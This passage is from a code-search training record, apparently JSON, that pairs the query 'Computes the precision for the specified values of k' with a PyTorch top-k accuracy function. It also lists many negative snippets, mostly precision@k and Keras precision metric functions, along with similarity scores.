global_rotation_noise = cfg.GLOBAL_ROTATION_UNIFORM_NOISE,\n global_scaling_noise = cfg.GLOBAL_SCALING_UNIFORM_NOISE,\n global_loc_noise_std = (0.2, 0.2, 0.2),\n global_random_rot_range = cfg.GLOBAL_RANDOM_ROTATION_RANGE_PER_OBJECT,\n db_sampler = db_sampler,\n unlabeled_db_sampler = u_db_sampler,\n generate_bev = generate_bev,\n without_reflectivity=without_reflectivity,\n num_point_features=num_point_features,\n anchor_area_threshold=cfg.ANCHOR_AREA_THRESHOLD,\n gt_points_drop=cfg.GROUNDTRUTH_POINTS_DROP_PERCENTAGE,\n gt_drop_max_keep=cfg.GROUNDTRUTH_DROP_MAX_KEEP_POINTS,\n remove_points_after_sample=cfg.REMOVE_POINTS_AFTER_SAMPLE,\n remove_environment=cfg.REMOVE_ENVIRONMENT,\n use_group_id=False,\n out_size_factor=out_size_factor)\n dataset = KittiDataset(\n info_path = cfg.KITTI_INFO_PATH,\n root_path=cfg.KITTI_ROOT_PATH,\n num_point_features=num_point_features,\n target_assigner=target_assigner,\n feature_map_size=feature_map_size,\n prep_func=prep_func\n )\n return dataset", "def dataset(options):\n pass", "def get_loaders(opt):\n train_samples, val_samples = get_train_val_metadata(opt.dataset_dir,\n opt.validation_cities,\n opt.patch_size,\n opt.stride)\n print('train samples : ', len(train_samples))\n print('val samples : ', len(val_samples))\n\n logging.info('STARTING Dataset Creation')\n\n full_load = full_onera_loader(opt.dataset_dir, opt)\n\n train_dataset = OneraPreloader(opt.dataset_dir,\n train_samples,\n full_load,\n opt.patch_size,\n opt.augmentation)\n val_dataset = OneraPreloader(opt.dataset_dir,\n val_samples,\n full_load,\n opt.patch_size,\n False)\n\n logging.info('STARTING Dataloading')\n\n train_loader = torch.utils.data.DataLoader(train_dataset,\n batch_size=opt.batch_size,\n shuffle=True,\n num_workers=opt.num_workers)\n val_loader = torch.utils.data.DataLoader(val_dataset,\n batch_size=opt.batch_size,\n shuffle=False,\n num_workers=opt.num_workers)\n return train_loader, val_loader", "def val_dataloader(self) -> DataLoader:\n loader_val = DataLoader(\n self.dataset_valid, \n batch_size=int(1.5 * self.args.batch_size),\n num_workers=self.args.num_workers,\n pin_memory=self.args.pin_mem,\n drop_last=False\n )\n return loader_val" ]
[ "0.7731121", "0.7497621", "0.72368264", "0.71800596", "0.7143441", "0.7102657", "0.7093028", "0.7014497", "0.6950995", "0.6860976", "0.6830999", "0.67986304", "0.6784964", "0.6782085", "0.67802626", "0.6743672", "0.6729586", "0.6659931", "0.66424596", "0.6627726", "0.6623991", "0.6619608", "0.6609511", "0.6607341", "0.6604726", "0.657813", "0.6576271", "0.65512574", "0.6545428", "0.6526977", "0.65076834", "0.6502126", "0.64992815", "0.6496821", "0.6457729", "0.6421005", "0.6420917", "0.6414877", "0.64116997", "0.6411119", "0.6398087", "0.638023", "0.63724226", "0.6312742", "0.6309674", "0.629974", "0.6297318", "0.6295838", "0.6291873", "0.62912697", "0.6276868", "0.6268379", "0.6264112", "0.6262327", "0.62587154", "0.6255372", "0.6253363", "0.6244811", "0.62433755", "0.6239795", "0.62219775", "0.62109774", "0.62102616", "0.62050986", "0.62050307", "0.62046003", "0.61895186", "0.61859834", "0.61853355", "0.61751187", "0.61688215", "0.61593294", "0.61507237", "0.6146844", "0.61444676", "0.6138137", "0.61034745", "0.6088552", "0.60823107", "0.6081238", "0.6079754", "0.6076254", "0.6068267", "0.6066863", "0.60566676", "0.60515976", "0.60493773", "0.6049095", "0.604589", "0.60440785", "0.6043266", "0.6040748", "0.60291326", "0.6021906", "0.6019508", "0.60100526", "0.59987366", "0.5991421", "0.59879994", "0.59800124", "0.5977117" ]
0.0
-1
Computes the precision for the specified values of k
def accuracy(output, target, topk=(1,)): maxk = max(topk) batch_size = target.size(0) _, pred = output.topk(maxk, 1, True, True) pred = pred.t() correct = pred.eq(target.view(1, -1).expand_as(pred)) res = [] for k in topk: correct_k = correct[:k].view(-1).float().sum(0, keepdim=True) res.append(correct_k.mul_(100.0 / batch_size)) return res
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def precision(gt, pred, k):\n k = min(len(pred), k)\n den = min(len(gt), k)\n return sum([int(pred[i] in gt) for i in range(k)]) / den", "def precision_at_k(r, k):\n assert k >= 1\n r = np.asarray(r)[:k] != 0\n if r.size != k:\n raise ValueError('Relevance score length < k')\n return np.mean(r)", "def precision_at_k(r, k):\n assert k >= 1\n r = np.asarray(r)[:k] != 0\n if r.size != k:\n raise ValueError('Relevance score length < k')\n return np.mean(r)", "def get_precision(self, k=None):\n k = 1 if k is None else k\n precisions = []\n \n for query, answer in tqdm(zip(self.test_queries, self.results)):\n correct_set = self.correct_answers[query]\n n_relevant = 0\n for candidate in answer[:k]:\n if candidate in correct_set:\n n_relevant += 1\n precisions.append(n_relevant / k)\n \n return np.mean(precisions)", "def metric_precision_at_k(pred: list, echt: list, k: int):\n echt_keys = [key for key, _ in echt[:k]]\n return sum([1.0 for key, _ in pred[:k] if key in echt_keys]) / float(k)", "def precision_at_k(model, ratings, k, relevance_func):\n predictions = model.predict_all()\n np.place(predictions, ratings == 0, -np.Inf)\n recommended = predictions.argsort(1)[::, :-k-1:-1]\n \n relevance_per_user = np.take_along_axis(ratings, recommended, 1)\n max_relevance_per_user = (relevance_per_user > 0).sum(1)\n relevance_per_user = relevance_func(relevance_per_user).sum(1)\n\n precision = np.divide(relevance_per_user, max_relevance_per_user)\n \n return np.nanmean(precision)", "def precision_recall_at_k(predictions, k=10, threshold=3.5):\r\n\r\n # First map the predictions to each user.\r\n user_est_true = defaultdict(list)\r\n for uid, _, true_r, est, _ in predictions:\r\n user_est_true[uid].append((est, true_r))\r\n\r\n precisions = dict()\r\n recalls = dict()\r\n for uid, user_ratings in user_est_true.items():\r\n\r\n # Sort user ratings by estimated value\r\n user_ratings.sort(key=lambda x: x[0], reverse=True)\r\n\r\n # Number of relevant items\r\n n_rel = sum((true_r >= threshold) for (_, true_r) in user_ratings)\r\n\r\n # Number of recommended items in top k\r\n n_rec_k = sum((est >= threshold) for (est, _) in user_ratings[:k])\r\n\r\n # Number of relevant and recommended items in top k\r\n n_rel_and_rec_k = sum(((true_r >= threshold) and (est >= threshold))\r\n for (est, true_r) in user_ratings[:k])\r\n\r\n # Precision@K: Proportion of recommended items that are relevant\r\n # When n_rec_k is 0, Precision is undefined. We here set it to 0.\r\n\r\n precisions[uid] = n_rel_and_rec_k / n_rec_k if n_rec_k != 0 else 0\r\n\r\n # Recall@K: Proportion of relevant items that are recommended\r\n # When n_rel is 0, Recall is undefined. We here set it to 0.\r\n\r\n recalls[uid] = n_rel_and_rec_k / n_rel if n_rel != 0 else 0\r\n\r\n return precisions, recalls", "def precision_at(\n ks: torch.Tensor, scores: torch.Tensor, labels: torch.Tensor\n) -> torch.Tensor:\n\n ks, scores, labels = _check_inputs(ks, scores, labels)\n _, _, topk_labels = _extract_topk(ks, scores, labels)\n precisions = _create_output_placeholder(scores, ks)\n\n for index, k in enumerate(ks):\n precisions[:, index] = torch.sum(topk_labels[:, : int(k)], dim=1) / float(k)\n\n return precisions", "def precision_at_k(r, k = None):\n assert k is None or k >= 1\n r = np.asarray(r)[:k] != 0\n if r.size != k and k is not None:\n raise ValueError('Relevance score length < k')\n return np.mean(r)", "def precision_recall_at_k(predictions, k, threshold):\n # First map the predictions to each user.\n user_est_true = defaultdict(list)\n for uid, _, true_r, est, _ in predictions:\n user_est_true[uid].append((est, true_r))\n\n precisions = dict()\n recalls = dict()\n for uid, user_ratings in user_est_true.items():\n\n # Sort user ratings by estimated value\n user_ratings.sort(key=lambda x: x[0], reverse=True)\n\n # Number of relevant items\n n_rel = sum((true_r >= threshold) for (_, true_r) in user_ratings)\n\n # Number of recommended items in top k\n n_rec_k = sum((est >= threshold) for (est, _) in user_ratings[:k])\n\n # Number of relevant and recommended items in top k\n n_rel_and_rec_k = sum(((true_r >= threshold) and (est >= threshold))\n for (est, true_r) in user_ratings[:k])\n\n # Precision@K: Proportion of recommended items that are relevant\n precisions[uid] = n_rel_and_rec_k / n_rec_k if n_rec_k != 0 else 1\n\n # Recall@K: Proportion of relevant items that are recommended\n recalls[uid] = n_rel_and_rec_k / n_rel if n_rel != 0 else 1\n\n # Precision and recall can then be averaged over all users\n overall_precisions = sum(\n prec for prec in precisions.values()) / len(precisions)\n overall_recalls = sum(rec for rec in recalls.values()) / len(recalls)\n\n return overall_precisions, overall_recalls", "def test2_precision_1d(self):\n arr1 = np.array([0, 1, 1])\n scores1 = np.array([0.2, 0.3, 0.5])\n scores1_not_sum_1 = np.array([x * 1542 for x in scores1])\n\n k = 1\n expected_normalized_precision_at_k = 1.0\n expected_precision_at_k = 1.0\n\n actual_normalized = ranking.precision_at_k(y_true=arr1, y_score=scores1, k=k, normalize=True)\n actual_normalized_not_sum_1 = ranking.precision_at_k(y_true=arr1, y_score=scores1_not_sum_1, k=k,\n normalize=True)\n actual = ranking.precision_at_k(y_true=arr1, y_score=scores1, k=k, normalize=False)\n actual_not_sum_1 = ranking.precision_at_k(y_true=arr1, y_score=scores1_not_sum_1, k=k, normalize=False)\n\n self.assertEqual(expected_normalized_precision_at_k, actual_normalized)\n self.assertEqual(expected_normalized_precision_at_k, actual_normalized_not_sum_1)\n self.assertEqual(expected_precision_at_k, actual)\n self.assertEqual(expected_precision_at_k, actual_not_sum_1)\n\n k = 2\n expected_normalized_precision_at_k = 1.0\n expected_precision_at_k = 1.0\n\n actual_normalized = ranking.precision_at_k(y_true=arr1, y_score=scores1, k=k, normalize=True)\n actual_normalized_not_sum_1 = ranking.precision_at_k(y_true=arr1, y_score=scores1_not_sum_1, k=k,\n normalize=True)\n actual = ranking.precision_at_k(y_true=arr1, y_score=scores1, k=k, normalize=False)\n actual_not_sum_1 = ranking.precision_at_k(y_true=arr1, y_score=scores1_not_sum_1, k=k, normalize=False)\n\n self.assertEqual(expected_normalized_precision_at_k, actual_normalized)\n self.assertEqual(expected_normalized_precision_at_k, actual_normalized_not_sum_1)\n self.assertEqual(expected_precision_at_k, actual)\n self.assertEqual(expected_precision_at_k, actual_not_sum_1)", "def pr_at_k(rels, expected_count, k):\n k = min(k, len(rels))\n TP = sum(rels[:k])\n FP = k - TP\n FN = expected_count - TP\n TN = len(rels[k:]) - sum(rels[k:])\n assert TN >= 0.0\n return TP / (TP + FP), TP / (TP + FN), TP / (TP + TN) if TP + TN > 0 else 0", "def precision(y_true, y_pred):\n true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))\n predicted_positives = K.sum(K.round(K.clip(y_pred, 0, 1)))\n precision = true_positives / (predicted_positives + K.epsilon())\n return precision", "def precision(y_true, y_pred):\r\n true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))\r\n predicted_positives = K.sum(K.round(K.clip(y_pred, 0, 1)))\r\n precision = true_positives / (predicted_positives + K.epsilon())\r\n return precision", "def precision(output, target, topk=(1,)):\n maxk = max(topk)\n batch_size = target.size(0)\n\n _, pred = output.topk(maxk, 1, True, True)\n pred = pred.t()\n correct = pred.eq(target.view(1, -1).expand_as(pred))\n\n res = []\n for k in topk:\n correct_k = correct[:k].view(-1).float().sum(0)\n res.append(correct_k.mul_(100.0 / batch_size))\n return res", "def precision(y_true, y_pred):\r\n true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))\r\n predicted_positives = K.sum(K.round(K.clip(y_pred, 0, 1)))\r\n precision = true_positives / (predicted_positives + K.epsilon())\r\n return precision", "def precision(y_true, y_pred):\r\n true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))\r\n predicted_positives = K.sum(K.round(K.clip(y_pred, 0, 1)))\r\n precision = true_positives / (predicted_positives + K.epsilon())\r\n return precision", "def precision(y_true, y_pred):\r\n true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))\r\n predicted_positives = K.sum(K.round(K.clip(y_pred, 0, 1)))\r\n precision = true_positives / (predicted_positives + K.epsilon())\r\n return precision", "def precision(y_true, y_pred):\r\n true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))\r\n predicted_positives = K.sum(K.round(K.clip(y_pred, 0, 1)))\r\n precision = true_positives / (predicted_positives + K.epsilon())\r\n return precision", "def precision(y_true, y_pred):\r\n true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))\r\n predicted_positives = K.sum(K.round(K.clip(y_pred, 0, 1)))\r\n precision = true_positives / (predicted_positives + K.epsilon())\r\n return precision", "def precision(y_true, y_pred):\r\n true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))\r\n predicted_positives = K.sum(K.round(K.clip(y_pred, 0, 1)))\r\n precision = true_positives / (predicted_positives + K.epsilon())\r\n return precision", "def precision(y_true, y_pred):\n true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))\n predicted_positives = K.sum(K.round(K.clip(y_pred, 0, 1)))\n precision = true_positives / (predicted_positives + K.epsilon())\n return precision", "def precision(y_true, y_pred):\n true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))\n predicted_positives = K.sum(K.round(K.clip(y_pred, 0, 1)))\n precision = true_positives / (predicted_positives + K.epsilon())\n return precision", "def precision(y_true, y_pred):\n true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))\n predicted_positives = K.sum(K.round(K.clip(y_pred, 0, 1)))\n precision = true_positives / (predicted_positives + K.epsilon())\n return precision", "def precision(y_true, y_pred):\n true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))\n predicted_positives = K.sum(K.round(K.clip(y_pred, 0, 1)))\n precision = true_positives / (predicted_positives + K.epsilon())\n return precision", "def precision(y_true, y_pred):\n true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))\n predicted_positives = K.sum(K.round(K.clip(y_pred, 0, 1)))\n precision = true_positives / (predicted_positives + K.epsilon())\n return precision", "def precision(y_true, y_pred):\n true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))\n predicted_positives = K.sum(K.round(K.clip(y_pred, 0, 1)))\n precision = true_positives / (predicted_positives + K.epsilon())\n return precision", "def precision(y_true, y_pred):\n true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))\n predicted_positives = K.sum(K.round(K.clip(y_pred, 0, 1)))\n precision = true_positives / (predicted_positives + K.epsilon())\n return precision", "def precision(y_true, y_pred):\n true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))\n predicted_positives = K.sum(K.round(K.clip(y_pred, 0, 1)))\n precision = true_positives / (predicted_positives + K.epsilon())\n return precision", "def precision(y_true, y_pred):\n true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))\n predicted_positives = K.sum(K.round(K.clip(y_pred, 0, 1)))\n precision = true_positives / (predicted_positives + K.epsilon())\n return precision", "def M_Precision(y_true, y_pred):\n\n true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))\n predicted_positives = K.sum(K.round(K.clip(y_pred, 0, 1)))\n precision = true_positives / (predicted_positives + K.constant(K.epsilon()))\n return precision", "def retrieval_precision(preds: Tensor, target: Tensor, k: Optional[int]=None, adaptive_k: bool=False) ->Tensor:\n preds, target = _check_retrieval_functional_inputs(preds, target)\n if not isinstance(adaptive_k, bool):\n raise ValueError('`adaptive_k` has to be a boolean')\n if k is None or adaptive_k and k > preds.shape[-1]:\n k = preds.shape[-1]\n if not (isinstance(k, int) and k > 0):\n raise ValueError('`k` has to be a positive integer or None')\n if not target.sum():\n return tensor(0.0, device=preds.device)\n relevant = target[preds.topk(min(k, preds.shape[-1]), dim=-1)[1]].sum().float()\n return relevant / k", "def keras_precision(y_true, y_pred):\n true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))\n predicted_positives = K.sum(K.round(K.clip(y_pred, 0, 1)))\n precision = true_positives / (predicted_positives + K.epsilon())\n return precision", "def average_precision_at_k(targets, ranked_predictions, k=None):\n if k:\n ranked_predictions = ranked_predictions[:k]\n score = 0.0\n hits = 0.0\n for i, pred in enumerate(ranked_predictions):\n if pred in targets and pred not in ranked_predictions[:i]:\n hits += 1.0\n score += hits / (i + 1.0)\n divisor = min(len(targets), k) if k else len(targets)\n return score / divisor", "def precision(y_true, y_pred):\n true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))\n predicted_positives = K.sum(K.round(K.clip(y_pred, 0, 1)))\n precision = true_positives / (predicted_positives + K.epsilon())\n return precision", "def precision(y_true, y_pred):\n true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))\n predicted_positives = K.sum(K.round(K.clip(y_pred, 0, 1)))\n precision = true_positives / (predicted_positives + K.epsilon())\n return precision", "def precision(y_true, y_pred):\n true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))\n predicted_positives = K.sum(K.round(K.clip(y_pred, 0, 1)))\n precision = true_positives / (predicted_positives + K.epsilon())\n return precision", "def precision(y_true, y_pred):\n true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))\n predicted_positives = K.sum(K.round(K.clip(y_pred, 0, 1)))\n precision = true_positives / (predicted_positives + K.epsilon())\n return precision", "def precision(y_true, y_pred):\n true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))\n predicted_positives = K.sum(K.round(K.clip(y_pred, 0, 1)))\n precision = true_positives / (predicted_positives + K.epsilon())\n return precision", "def precision(y_true, y_pred):\n true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))\n predicted_positives = K.sum(K.round(K.clip(y_pred, 0, 1)))\n precision = true_positives / (predicted_positives + K.epsilon())\n return precision", "def precision(y_true, y_pred):\n true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))\n predicted_positives = K.sum(K.round(K.clip(y_pred, 0, 1)))\n precision = true_positives / (predicted_positives + K.epsilon())\n return precision", "def precision(y_true, y_pred):\n true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))\n predicted_positives = K.sum(K.round(K.clip(y_pred, 0, 1)))\n precision = true_positives / (predicted_positives + K.epsilon())\n return precision", "def precision(y_true, y_pred):\n true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))\n predicted_positives = K.sum(K.round(K.clip(y_pred, 0, 1)))\n precision = true_positives / (predicted_positives + K.epsilon())\n return precision", "def precision(y_true, y_pred):\n true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))\n predicted_positives = K.sum(K.round(K.clip(y_pred, 0, 1)))\n precision = true_positives / (predicted_positives + K.epsilon())\n return precision", "def precision(y_true, y_pred):\n true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))\n predicted_positives = K.sum(K.round(K.clip(y_pred, 0, 1)))\n precision = true_positives / (predicted_positives + K.epsilon())\n return precision", "def precision(y_true, y_pred):\n true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))\n predicted_positives = K.sum(K.round(K.clip(y_pred, 0, 1)))\n precision = true_positives / (predicted_positives + K.epsilon())\n return precision", "def precision(y_true, y_pred):\n true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))\n predicted_positives = K.sum(K.round(K.clip(y_pred, 0, 1)))\n precision = true_positives / (predicted_positives + K.epsilon())\n return precision", "def precision(y_true, y_pred):\n true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))\n predicted_positives = K.sum(K.round(K.clip(y_pred, 0, 1)))\n precision = true_positives / (predicted_positives + K.epsilon())\n return precision", "def precision(y_true, y_pred):\n true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))\n predicted_positives = K.sum(K.round(K.clip(y_pred, 0, 1)))\n precision = true_positives / (predicted_positives + K.epsilon())\n return precision", "def precision(y_true, y_pred):\n true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))\n predicted_positives = K.sum(K.round(K.clip(y_pred, 0, 1)))\n precision = true_positives / (predicted_positives + K.epsilon())\n return precision", "def precision(y_true, y_pred):\n true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))\n predicted_positives = K.sum(K.round(K.clip(y_pred, 0, 1)))\n precision = true_positives / (predicted_positives + K.epsilon())\n return precision", "def precision(y_true, y_pred):\n true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))\n predicted_positives = K.sum(K.round(K.clip(y_pred, 0, 1)))\n precision = true_positives / (predicted_positives + K.epsilon())\n return precision", "def precision(y_true, y_pred):\n true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))\n predicted_positives = K.sum(K.round(K.clip(y_pred, 0, 1)))\n precision = true_positives / (predicted_positives + K.epsilon())\n return precision", "def cdf(self, k):\n\n if k < 0 or k > self.n:\n return 0\n\n k = int(k)\n ans = 0\n for i in range(0, k + 1):\n ans += self.pmf(i)\n return ans", "def getPrecision(y_true, y_pred):\r\n true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))\r\n predicted_positives = K.sum(K.round(K.clip(y_pred, 0, 1)))\r\n precision = true_positives / (predicted_positives + K.epsilon())\r\n return precision", "def compute_pr_at_k(k, true_labels, test_statistics=None, pvalues=None):\n if (test_statistics is not None) and (pvalues is not None):\n raise ValueError(\"You cannot supply both `test_statistics` and `pvalues`.\")\n\n if test_statistics is not None:\n res = test_statistics\n reverse_sorting = True\n else:\n res = pvalues\n reverse_sorting = False\n\n label_matrix = np.zeros((len(true_labels), len(true_labels)))\n c1 = (true_labels == 0).sum()\n label_matrix[:c1, :c1] = 1\n\n triu_idx = np.triu_indices_from(res, k=1)\n labels_vec = label_matrix[triu_idx]\n res_vec = res[triu_idx]\n\n idx = np.argsort(res_vec)\n if reverse_sorting:\n idx = idx[::-1]\n sorted_labels = labels_vec[idx]\n\n if isinstance(k, int):\n ks = range(1, k + 1)\n else:\n ks = k\n\n precisions = [sorted_labels[:k].mean() for k in ks]\n recalls = [sorted_labels[:k].sum() / sorted_labels.sum() for k in ks]\n\n return precisions, recalls", "def numSubarrayProductLessThanK(self, nums: List[int], k: int) -> int:\n\n if not nums:\n return 0\n\n if k <= 1:\n return 0\n\n count = 0\n lo = 0\n product = 1\n for hi in range(len(nums)):\n product *= nums[hi]\n while product >= k:\n product /= nums[lo]\n lo += 1\n count += hi - lo + 1\n return count", "def prf_cal(y_pred,y_true,k):\r\n GT=np.sum(y_true[y_true==1.])\r\n instance_num=y_true.shape[0]\r\n prediction_num=instance_num*k\r\n\r\n sort_indices = np.argsort(y_pred)\r\n sort_indices=sort_indices[:,::-1]\r\n static_indices = np.indices(sort_indices.shape)\r\n sorted_annotation= y_true[static_indices[0],sort_indices]\r\n top_k_annotation=sorted_annotation[:,0:k]\r\n TP=np.sum(top_k_annotation[top_k_annotation==1.])\r\n recall=TP/GT\r\n precision=TP/prediction_num\r\n f1=2.*recall*precision/(recall+precision)\r\n return precision, recall, f1", "def apk(y_true, y_pred, k):\n \n # initialize p@k list of values\n pk_values = []\n \n # loop over all k. from 1 to k+1\n for i in range(1, k + 1):\n # calculate p@i and append to list\n pk_values.append(pk(y_true, y_pred, i))\n \n # if we have no values in the list, return 0\n if len(pk_values) == 0:\n return 0\n # else, we return the sum of list over length of list\n return sum(pk_values) / len(pk_values)", "def mapk(actual, predicted, k):\n return round(np.mean([apk(a,p,k) for a,p in zip(actual, predicted)]), 4) * 100", "def __init__(self, k=10, cutoff=0.5):\n if k < 0:\n raise ValueError('k must be positive')\n super(Precision, self).__init__()\n self.k = k\n self.cutoff = cutoff", "def _K(s):\n p = 0\n for k in range(-10, 10, 1):\n p += (-1)**k * np.exp(-2 * k**2 * s**2)\n return p", "def ensure_positive_precision(K):\n K_diag = np.diag(np.diag(K))\n K = np.where(np.any(np.diag(K) < 0), np.where(K_diag < 0, 1e-2, K_diag), K)\n return K", "def _compute_parameters(self, p, k):\n for i in range(self._.d + 1):\n p[0, i, i] = k[i]\n p[i, 0, i] = Integer(1)\n p[i, i, 0] = Integer(1)\n for i in range(self._.d):\n p[i+1, 1, i+1] = self._.a[i+1]\n p[i, 1, i+1] = self._.b[i]\n p[i+1, 1, i] = self._.c[i+1]\n for i in range(2, self._.d + 1):\n for j in range(1, self._.d + 1):\n for h in range(1, self._.d):\n p[h, i, j] = self._check_parameter(\n h, i, j,\n _simplify(_expand((\n self._.c[h] * p[h-1, i-1, j]\n + self._.b[h] * p[h+1, i-1, j]\n - self._.b[i-2] * p[h, i-2, j]\n + (self._.a[h] - self._.a[i-1]) * p[h, i-1, j]\n ) / self._.c[i])))\n p[self._.d, i, j] = self._check_parameter(\n self._.d, i, j,\n _simplify(_expand((\n self._.c[self._.d] * p[self._.d-1, i-1, j]\n - self._.b[i-2] * p[self._.d, i-2, j]\n + (self._.a[self._.d] - self._.a[i-1])\n * p[self._.d, i-1, j]\n ) / self._.c[i])))", "def _calculate_probability(self,k):\n\t\tif abs(k * self.delta_x) > (3 * np.sqrt(self.variance)):\n\t\t\treturn 0.0\n\t\tbinom_coeff = special.binom(self.n,(self.n + k)/2)\n\t\tb_value = binom_coeff * ((self.p) ** ((self.n + k)/2)) * ((1-self.p) ** ((self.n - k)/2))\n\t\treturn b_value", "def kx(self, k: int) -> float:\n result = self._read_inline(f\"kx({k})\")\n return result", "def pmf(self, k):\n\n if k < 0 or k > self.n:\n return 0\n\n k = int(k)\n\n c = (Binomial.factorial(self.n)) / \\\n (Binomial.factorial(k) * self.factorial((self.n - k)))\n\n return c * pow(self.p, k) * pow((1 - self.p), (self.n - k))", "def probability(n, k, p):\n prob = 0\n power = expotentation_by_squaring((1-p), n)\n count_mult = math.log(n, 2)\n p_fraction = p/(1-p)\n count_mult += 1\n for i in range(0, k+1):\n element = newton(n, i)*power\n prob += element\n power *= p_fraction\n count_mult += 2\n return prob, count_mult", "def precision(y_true, y_pred):\n true_positives = bk.sum(bk.round(bk.clip(y_true * y_pred, 0, 1)))\n predicted_positives = bk.sum(bk.round(bk.clip(y_pred, 0, 1)))\n precision = true_positives / (predicted_positives + bk.epsilon())\n return precision", "def recall_at_k(self, positions, k, num_samples):\n return 1.0 * sum(i <= k for i in positions) / num_samples", "def params_to_precision(kernel):\n\n return kernel.precision()", "def pkscore(labels, preds, k=10):\n # Remove padding from labels and preds\n mask = np.where(labels<=1, True, False)\n labels = labels[mask]\n preds = preds[mask]\n\n num_windows = len(labels) - k + 1\n assert num_windows>0, 'Choose a smaller k value'\n\n correct = 0\n for i in range(num_windows):\n # calculate index of window close\n j = i + k\n\n # Get number of segment splits in labels and preds\n label_diff = sum(labels[i:j])\n pred_diff = sum(preds[i:j])\n\n # Check for agreement between labels and preds\n if (label_diff and pred_diff) or (not label_diff and not pred_diff):\n correct += 1\n return 1-(correct/(num_windows))", "def queryPrecision(self, query_doc_IDs_ordered, query_id, true_doc_IDs, k):\n\n\t\tprecision = -1\n\n\t\t#Fill in code here\n\t\trel_ret = 0 # no. of relevant docs retrieved\n\n\t\tfor docID in query_doc_IDs_ordered[:k]:\n\t\t\tif docID in true_doc_IDs:\n\t\t\t\trel_ret += 1\n\n\t\tprecision = rel_ret/k\n\n\t\treturn precision", "def expected_jk_variance(K):\r\n\r\n kf = float(K)\r\n return ((1 / kf) * (kf - 1) / (kf - 0.5) *\r\n ((kf - 1) / (kf - 2)) ** 2 * (kf - 3) / (kf - 2))", "def test_approximate_gamma(self, k):\n mean_column = prior.PriorParams.field_index(\"mean\")\n var_column = prior.PriorParams.field_index(\"var\")\n x = self.priors[self.n][k][mean_column]\n xvar = self.priors[self.n][k][var_column]\n # match mean/variance\n alpha_0, beta_0 = approximate_gamma_mom(x, xvar)\n ck_x = alpha_0 / beta_0\n ck_xvar = alpha_0 / beta_0**2\n assert np.isclose(x, ck_x)\n assert np.isclose(xvar, ck_xvar)\n # match approximate sufficient statistics\n logx, _, _ = approx.approximate_log_moments(x, xvar)\n alpha_1, beta_1 = approx.approximate_gamma_kl(x, logx)\n ck_x = alpha_1 / beta_1\n ck_logx = hypergeo._digamma(alpha_1) - np.log(beta_1)\n assert np.isclose(x, ck_x)\n assert np.isclose(logx, ck_logx)\n # compare KL divergence between strategies\n kl_0 = kl_divergence(\n lambda x: conditional_coalescent_pdf(x, self.n, k),\n lambda x: scipy.stats.gamma.logpdf(x, alpha_0, scale=1 / beta_0),\n )\n kl_1 = kl_divergence(\n lambda x: conditional_coalescent_pdf(x, self.n, k),\n lambda x: scipy.stats.gamma.logpdf(x, alpha_1, scale=1 / beta_1),\n )\n assert kl_1 < kl_0", "def topk_accuracies(preds, labels, ks):\n num_topks_correct = topks_correct(preds, labels, ks)\n return [(x / preds.size(0)) * 100.0 for x in num_topks_correct]", "def precision_on_1(y_true, y_pred):\n true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))\n predicted_positives = K.sum(K.round(K.clip(y_pred, 0, 1)))\n precision = true_positives / (predicted_positives + K.epsilon())\n return precision", "def pmf(self, k):\n if k % 1 != 0:\n k = int(k)\n if k < 0 and k <= self.n:\n return 0\n q = 1 - self.p\n co = (self.factorial(self.n) / ((self.factorial(self.n-k)\n * self.factorial(k))))\n q2 = q ** (self.n - k)\n return co * (self.p ** k) * q2", "def C(n,k):\n if 0 <= k <= n:\n ntok = 1\n ktok = 1\n for t in xrange(1, min(k, n - k) + 1):\n ntok *= n\n ktok *= t\n n -= 1\n return ntok // ktok\n else:\n return 0", "def f1_score_at_k(r, max_rel, k = None):\n p = precision_at_k(r, k)\n r = recall_at_k(r, max_rel, k)\n return 2 * p * r / (p + r)", "def calPFP(n, m, k):\n return pow(1-math.exp(-k*(n+0.5)/(m-1)), k)", "def kepler(x, k=1.0):\n assert(x.shape[2] == 1)\n\n q,p = extract_q_p(x)\n # The derivative of r wrt q is 1/sqrt(sum(q^2)), which is singular in 